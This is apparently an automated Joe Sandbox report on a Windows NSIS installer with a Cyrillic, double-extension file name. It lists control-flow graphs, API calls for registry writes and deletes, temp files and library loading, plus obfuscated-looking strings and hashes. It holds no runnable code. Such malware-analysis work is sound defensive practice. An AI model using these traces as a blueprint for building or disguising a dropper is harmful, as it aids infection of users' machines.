                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 552 401767-40178c call 402bbf call 405a7b 557 401796-4017a8 call 406050 call 405a04 lstrcatW 552->557 558 40178e-401794 call 406050 552->558 563 4017ad-4017ae call 4062e4 557->563 558->563 567 4017b3-4017b7 563->567 568 4017b9-4017c3 call 406393 567->568 569 4017ea-4017ed 567->569 577 4017d5-4017e7 568->577 578 4017c5-4017d3 CompareFileTime 568->578 570 4017f5-401811 call 405c25 569->570 571 4017ef-4017f0 call 405c00 569->571 579 401813-401816 570->579 580 401885-4018ae call 4051af call 403027 570->580 571->570 577->569 578->577 581 401867-401871 call 4051af 579->581 582 401818-401856 call 406050 * 2 call 406072 call 406050 call 405795 579->582 594 4018b0-4018b4 580->594 595 4018b6-4018c2 SetFileTime 580->595 592 40187a-401880 581->592 582->567 614 40185c-40185d 582->614 597 402a55 592->597 594->595 596 4018c8-4018d3 FindCloseChangeNotification 594->596 595->596 599 4018d9-4018dc 596->599 600 402a4c-402a4f 596->600 602 402a57-402a5b 597->602 603 4018f1-4018f4 call 406072 599->603 604 4018de-4018ef call 406072 lstrcatW 599->604 600->597 610 4018f9-40228d call 405795 603->610 604->610 610->600 610->602 614->592 616 40185f-401860 614->616 616->581
                                                            APIs
                                                            • lstrcatW.KERNEL32(00000000,00000000), ref: 004017A8
                                                            • CompareFileTime.KERNEL32(-00000014,?,kennelklub,kennelklub,00000000,00000000,kennelklub,C:\Users\user\AppData\Local\nervier\Estampede\sipunculacean\Nonhomiletic\Svelningen,?,?,00000031), ref: 004017CD
                                                              • Part of subcall function 00406050: lstrcpynW.KERNEL32(?,?,00000400,0040334D,petrels,NSIS Error), ref: 0040605D
                                                              • Part of subcall function 004051AF: lstrlenW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsa52CB.tmp\,00000000,?,76F923A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051E7
                                                              • Part of subcall function 004051AF: lstrlenW.KERNEL32(0040318B,Remove folder: C:\Users\user\AppData\Local\Temp\nsa52CB.tmp\,00000000,?,76F923A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051F7
                                                              • Part of subcall function 004051AF: lstrcatW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsa52CB.tmp\,0040318B), ref: 0040520A
                                                              • Part of subcall function 004051AF: SetWindowTextW.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsa52CB.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsa52CB.tmp\), ref: 0040521C
                                                              • Part of subcall function 004051AF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405242
                                                              • Part of subcall function 004051AF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040525C
                                                              • Part of subcall function 004051AF: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                            • String ID: %trrelofternes%\Kompletteringernes.mov$C:\Users\user\AppData\Local\nervier\Estampede\sipunculacean\Nonhomiletic\Svelningen$Software\dekanesserne\stragglingly$kennelklub
                                                            • API String ID: 1941528284-2854214120
                                                            • Opcode ID: 48b6b41de5415a997d64e94515e943f099cd3abaac6b35bff8bc5272db3fa193
                                                            • Instruction ID: fa226e2697354f8a36450ecb7523776f7f82d9f29d3b914395726c71c929f9d2
                                                            • Opcode Fuzzy Hash: 48b6b41de5415a997d64e94515e943f099cd3abaac6b35bff8bc5272db3fa193
                                                            • Instruction Fuzzy Hash: 37418471900514BADF11BBB5CC46EAF7679EF45328F20823BF522B10E1DB3C8A519A6D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 618 4051af-4051c4 619 4051ca-4051db 618->619 620 40527b-40527f 618->620 621 4051e6-4051f2 lstrlenW 619->621 622 4051dd-4051e1 call 406072 619->622 624 4051f4-405204 lstrlenW 621->624 625 40520f-405213 621->625 622->621 624->620 626 405206-40520a lstrcatW 624->626 627 405222-405226 625->627 628 405215-40521c SetWindowTextW 625->628 626->625 629 405228-40526a SendMessageW * 3 627->629 630 40526c-40526e 627->630 628->627 629->630 630->620 631 405270-405273 630->631 631->620
                                                            APIs
                                                            • lstrlenW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsa52CB.tmp\,00000000,?,76F923A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051E7
                                                            • lstrlenW.KERNEL32(0040318B,Remove folder: C:\Users\user\AppData\Local\Temp\nsa52CB.tmp\,00000000,?,76F923A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051F7
                                                            • lstrcatW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsa52CB.tmp\,0040318B), ref: 0040520A
                                                            • SetWindowTextW.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsa52CB.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsa52CB.tmp\), ref: 0040521C
                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405242
                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040525C
                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                            • String ID: Remove folder: C:\Users\user\AppData\Local\Temp\nsa52CB.tmp\
                                                            • API String ID: 2531174081-3573613579
                                                            • Opcode ID: 00247a6464f5c3c901f3e71bb549cec16c26b63cf5655e6d63979758284adbde
                                                            • Instruction ID: 3abc69651b1b947d68a29ef5f67bb3ab151c750651a003a3f474b57aa403b91e
                                                            • Opcode Fuzzy Hash: 00247a6464f5c3c901f3e71bb549cec16c26b63cf5655e6d63979758284adbde
                                                            • Instruction Fuzzy Hash: E6216D71900518BACB119FA5DD85ECFBFB8EF45354F14807AF944B62A0C7798A50CF68
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 632 403027-40303e 633 403040 632->633 634 403047-403050 632->634 633->634 635 403052 634->635 636 403059-40305e 634->636 635->636 637 403060-403069 call 403258 636->637 638 40306e-40307b call 403242 636->638 637->638 642 403230 638->642 643 403081-403085 638->643 644 403232-403233 642->644 645 4031db-4031dd 643->645 646 40308b-4030d4 GetTickCount 643->646 649 40323b-40323f 644->649 647 40321d-403220 645->647 648 4031df-4031e2 645->648 650 403238 646->650 651 4030da-4030e2 646->651 655 403222 647->655 656 403225-40322e call 403242 647->656 648->650 652 4031e4 648->652 650->649 653 4030e4 651->653 654 4030e7-4030f5 call 403242 651->654 658 4031e7-4031ed 652->658 653->654 654->642 666 4030fb-403104 654->666 655->656 656->642 664 403235 656->664 661 4031f1-4031ff call 403242 658->661 662 4031ef 658->662 661->642 669 403201-40320d call 405cd7 661->669 662->661 664->650 668 40310a-40312a call 406549 666->668 674 403130-403143 GetTickCount 668->674 675 4031d3-4031d5 668->675 676 4031d7-4031d9 669->676 677 40320f-403219 669->677 678 403145-40314d 674->678 679 40318e-403190 674->679 675->644 676->644 677->658 682 40321b 677->682 683 403155-403186 MulDiv wsprintfW call 4051af 678->683 684 40314f-403153 678->684 680 403192-403196 679->680 681 4031c7-4031cb 679->681 686 403198-40319f call 405cd7 680->686 687 4031ad-4031b8 680->687 681->651 688 4031d1 681->688 682->650 689 40318b 683->689 684->679 684->683 692 4031a4-4031a6 686->692 691 4031bb-4031bf 687->691 688->650 689->679 691->668 693 4031c5 691->693 692->676 694 4031a8-4031ab 692->694 693->650 694->691
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: CountTick$wsprintf
                                                            • String ID: ... %d%%$@
                                                            • API String ID: 551687249-3859443358
                                                            • Opcode ID: c7497415bb8dac91a47c0922d01840e0ec24c5b3dd3d0398628956ac72cbd470
                                                            • Instruction ID: a151fef9e86e41fc3429002d146a23742bf049d8b35666da4da471479faf367b
                                                            • Opcode Fuzzy Hash: c7497415bb8dac91a47c0922d01840e0ec24c5b3dd3d0398628956ac72cbd470
                                                            • Instruction Fuzzy Hash: F9517C71901219EBDB10CF65DA44BAE3BA8AF05766F10417BF815B72C0C7789A41CBAA
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 695 40567e-4056c9 CreateDirectoryW 696 4056cb-4056cd 695->696 697 4056cf-4056dc GetLastError 695->697 698 4056f6-4056f8 696->698 697->698 699 4056de-4056f2 SetFileSecurityW 697->699 699->696 700 4056f4 GetLastError 699->700 700->698
                                                            APIs
                                                            • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004056C1
                                                            • GetLastError.KERNEL32 ref: 004056D5
                                                            • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056EA
                                                            • GetLastError.KERNEL32 ref: 004056F4
                                                            Strings
                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004056A4
                                                            • C:\Users\user\Desktop, xrefs: 0040567E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                            • API String ID: 3449924974-1729097607
                                                            • Opcode ID: 00ef7c6a0f32c1044080c086edeac3c819c61aa9b54d8d974478d91d60ac005e
                                                            • Instruction ID: dfae01ed47dc7750d2476d71b6e364c3d252909874df994a371284b211a748b1
                                                            • Opcode Fuzzy Hash: 00ef7c6a0f32c1044080c086edeac3c819c61aa9b54d8d974478d91d60ac005e
                                                            • Instruction Fuzzy Hash: 18011A71D10619DADF009FA0CA447EFBFB8EF14304F00443AD549B6190E7799608CFA9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 701 4063ba-4063da GetSystemDirectoryW 702 4063dc 701->702 703 4063de-4063e0 701->703 702->703 704 4063f1-4063f3 703->704 705 4063e2-4063eb 703->705 706 4063f4-406427 wsprintfW LoadLibraryExW 704->706 705->704 707 4063ed-4063ef 705->707 707->706
                                                            APIs
                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D1
                                                            • wsprintfW.USER32 ref: 0040640C
                                                            • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406420
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                            • String ID: %s%S.dll$UXTHEME$\
                                                            • API String ID: 2200240437-1946221925
                                                            • Opcode ID: 9cd176900e46196ffcfca9c6351026e8055dbc09b9427d0f5483d49a535bfda6
                                                            • Instruction ID: 7b807a610878b0bc4ee9c08e82fc2c2c0a074289e2a27b7b834fb84ffe8ff7bb
                                                            • Opcode Fuzzy Hash: 9cd176900e46196ffcfca9c6351026e8055dbc09b9427d0f5483d49a535bfda6
                                                            • Instruction Fuzzy Hash: 09F0F670500219A7DB10AB68ED0DF9B3A6CEB00304F50443AA946F10D1EBB8DA29CBE8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 708 40237b-4023c1 call 402cb4 call 402bbf * 2 RegCreateKeyExW 715 4023c7-4023cf 708->715 716 402a4c-402a5b 708->716 717 4023d1-4023de call 402bbf lstrlenW 715->717 718 4023e2-4023e5 715->718 717->718 721 4023f5-4023f8 718->721 722 4023e7-4023f4 call 402ba2 718->722 726 402409-40241d RegSetValueExW 721->726 727 4023fa-402404 call 403027 721->727 722->721 729 402422-4024fc RegCloseKey 726->729 730 40241f 726->730 727->726 729->716 730->729
                                                            APIs
                                                            • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                                                            • lstrlenW.KERNEL32(%trrelofternes%\Kompletteringernes.mov,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                                                            • RegSetValueExW.KERNELBASE(?,?,?,?,%trrelofternes%\Kompletteringernes.mov,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                                                            • RegCloseKey.KERNELBASE(?,?,?,%trrelofternes%\Kompletteringernes.mov,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateValuelstrlen
                                                            • String ID: %trrelofternes%\Kompletteringernes.mov
                                                            • API String ID: 1356686001-4206975670
                                                            • Opcode ID: d4526a9f19cb4fa91cfbba4e7a4db7738b3ffa107e1b43a04beea7537d0b9b62
                                                            • Instruction ID: 52a733b9c8e4ab95676b633cdda8f3d85a752b7ae8d5fcc25206d9d14f9091af
                                                            • Opcode Fuzzy Hash: d4526a9f19cb4fa91cfbba4e7a4db7738b3ffa107e1b43a04beea7537d0b9b62
                                                            • Instruction Fuzzy Hash: A4118E71A00108BFEB11AFA5DE89DAE777DEB44358F11403AF904B61D1DBB85E409668
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 733 405c54-405c60 734 405c61-405c95 GetTickCount GetTempFileNameW 733->734 735 405ca4-405ca6 734->735 736 405c97-405c99 734->736 738 405c9e-405ca1 735->738 736->734 737 405c9b 736->737 737->738
                                                            APIs
                                                            • GetTickCount.KERNEL32 ref: 00405C72
                                                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe",0040329E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00405C8D
                                                            Strings
                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C59
                                                            • nsa, xrefs: 00405C61
                                                            • "C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe", xrefs: 00405C54
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: CountFileNameTempTick
                                                            • String ID: "C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                            • API String ID: 1716503409-3718577378
                                                            • Opcode ID: da3add3990966c57ea49aa46ced784fea404a948837784a5301244cb17f573d8
                                                            • Instruction ID: 1b208e64e042baf7dbd80c3cabdcb34a7d602449cab37475291322263c582f77
                                                            • Opcode Fuzzy Hash: da3add3990966c57ea49aa46ced784fea404a948837784a5301244cb17f573d8
                                                            • Instruction Fuzzy Hash: 7CF09076700708BFEB00DF59DD49A9BBBBCEB91710F10403AF940E7180E6B49A548B64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 739 402bff-402c28 RegOpenKeyExW 740 402c93-402c97 739->740 741 402c2a-402c35 739->741 742 402c50-402c60 RegEnumKeyW 741->742 743 402c62-402c74 RegCloseKey call 40642a 742->743 744 402c37-402c3a 742->744 752 402c76-402c85 743->752 753 402c9a-402ca0 743->753 745 402c87-402c8a RegCloseKey 744->745 746 402c3c-402c4e call 402bff 744->746 748 402c90-402c92 745->748 746->742 746->743 748->740 752->740 753->748 754 402ca2-402cb0 RegDeleteKeyW 753->754 754->748 756 402cb2 754->756 756->740
                                                            APIs
                                                            • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402C20
                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                                            • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                                            • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: Close$DeleteEnumOpen
                                                            • String ID:
                                                            • API String ID: 1912718029-0
                                                            • Opcode ID: 63d61aba69846c39a340c92fc89b84eecc01f6a36edae5aa348db2d0b7e3277e
                                                            • Instruction ID: a55e164afb4a2c5db24f06852be026e23ac61ce6859740a963365f2f7f7eec81
